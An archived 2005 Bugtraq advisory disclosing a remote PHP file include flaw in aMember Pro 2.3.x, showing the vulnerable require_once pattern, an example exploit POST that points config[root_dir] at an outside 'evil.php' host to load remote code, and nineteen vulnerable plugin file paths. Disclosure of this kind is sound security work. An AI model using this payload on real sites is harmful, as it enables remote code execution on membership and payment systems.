lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050905010854.4675.qmail@securityfocus.com>
Date: 5 Sep 2005 01:08:54 -0000
From: 4Degrees@...nd2.com
To: bugtraq@...urityfocus.com
Subject: [NewAngels Advisory] aMember Pro 2.3.X - Remote File Include
 Vulnerability


[NewAngels Advisory #2] aMember Pro 2.3.X - Remote File Include Vulnerability
=============================================================================


Software: aMember Pro 2.3.4
Type: Remote PHP File Include Vulnerability
Risk: High

Date: Aug. 16 2005
Vendor: CGI Central


Credit:
=======
NewAngels Team with special note of 4Degrees.


Description:
============
"aMember is a flexible membership and subscription management PHP script. It has support for PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling, Multicards, E-Gold and Clickbank payment systems (complete list can be found here) and allows you to setup paid-membership areas on your site. It can also be used without any payment system - you can manage users manually."
[http://www.amember.com/]


PHP Requirements:
=================
register_globals = On


Vulnerability:
==============
Source:
>global $config;
>[...]
>require_once($config['root_dir']."...somestring...");




Exploitation:
=============
This vulnerability exists in several files, the code is not exactly the same in all files.
But the exploit does remain the same.

Example: http://www.somesite.com/aMember/plugins/db/mysql/mysql.inc.php
POST: config[root_dir]=http://www.46and2.com/evil.php?

Vulnerable Files:
/aMember/plugins/db/mysql/mysql.inc.php
/aMember/plugins/payment/efsnet/efsnet.inc.php
/aMember/plugins/payment/theinternetcommerce/theinternetcommerce.inc.php
/aMember/plugins/payment/cdg/cdg.inc.php
/aMember/plugins/payment/compuworld/compuworld.inc.php
/aMember/plugins/payment/directone/directone.inc.php
/aMember/plugins/payment/authorize_aim/authorize_aim.inc.php
/aMember/plugins/payment/beanstream/beanstream.inc.php
/aMember/plugins/payment/echo/config.inc.php
/aMember/plugins/payment/eprocessingnetwork/eprocessingnetwork.inc.php
/aMember/plugins/payment/eway/eway.inc.php
/aMember/plugins/payment/linkpoint/linkpoint.inc.php
/aMember/plugins/payment/logiccommerce/logiccommerce.inc.php
/aMember/plugins/payment/netbilling/netbilling.inc.php
/aMember/plugins/payment/payflow_pro/payflow_pro.inc.php
/aMember/plugins/payment/paymentsgateway/paymentsgateway.inc.php
/aMember/plugins/payment/payos/payos.inc.php
/aMember/plugins/payment/payready/payready.inc.php
/aMember/plugins/payment/plugnplay/plugnplay.inc.php


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ